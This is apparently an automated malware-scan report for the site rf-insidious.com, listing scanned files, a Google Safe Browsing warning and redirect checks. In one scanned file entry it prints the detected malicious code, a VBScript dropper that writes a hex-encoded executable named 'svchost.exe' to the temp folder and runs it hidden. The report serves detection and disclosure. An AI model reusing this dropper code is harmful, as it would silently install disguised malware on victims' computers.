Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rf-insidious.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rf-insidious.com/ | 200 OK Content-Length: 8497 Content-Type: text/html | clean |
http://rf-insidious.com/javascript/jquery.js | 200 OK Content-Length: 104632 Content-Type: application/javascript | clean |
http://rf-insidious.com/javascript/ajax.js | 200 OK Content-Length: 3088 Content-Type: application/javascript | clean |
http://rf-insidious.com/index.php | 200 OK Content-Length: 8497 Content-Type: text/html | clean |
http://rf-insidious.com/Descarga.php | 200 OK Content-Length: 2085 Content-Type: text/html | clean |
http://rf-insidious.com/test404page.js | 404 Not Found Content-Length: 203611 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://rf-insidious.com/registro/index.html | 200 OK Content-Length: 107528 Content-Type: text/html | clean |
http://rf-insidious.com/registro/js/prototype.js | 200 OK Content-Length: 107528 Content-Type: application/javascript | clean |
http://rf-insidious.com/registro/js/jquery.js | 200 OK Content-Length: 95944 Content-Type: application/javascript | clean |
http://rf-insidious.com/registro/js/validar.js | 200 OK Content-Length: 24521 Content-Type: application/javascript | clean |
http://rf-insidious.com/ranking2.php | 200 OK Content-Length: 3233 Content-Type: text/html | clean |
http://rf-insidious.com/ranking.php?dios=1 | 200 OK Content-Length: 9880 Content-Type: text/html | clean |
http://rf-insidious.com/ranking.php?dios=4 | 200 OK Content-Length: 9859 Content-Type: text/html | clean |
http://rf-insidious.com/ranking.php?dios=2 | 200 OK Content-Length: 9964 Content-Type: text/html | clean |
http://rf-insidious.com/ranking.php?dios=<?php=$trimurity?>&tribu=4 | 200 OK Content-Length: 9912 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rf-insidious.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 Jan 2015 09:13:20 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
Content-Type: text/html
X-Powered-By: PHP/5.3.1
GET / HTTP/1.1
Host: rf-insidious.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 Jan 2015 09:13:20 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
Content-Type: text/html
X-Powered-By: PHP/5.3.1
Second query (visit from search engine):
GET / HTTP/1.1
Host: rf-insidious.com
Referer: http://www.google.com/search?q=rf-insidious.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rf-insidious.com
Referer: http://www.google.com/search?q=rf-insidious.com
Result:
The result is similar to the first query. There are no suspicious redirects found.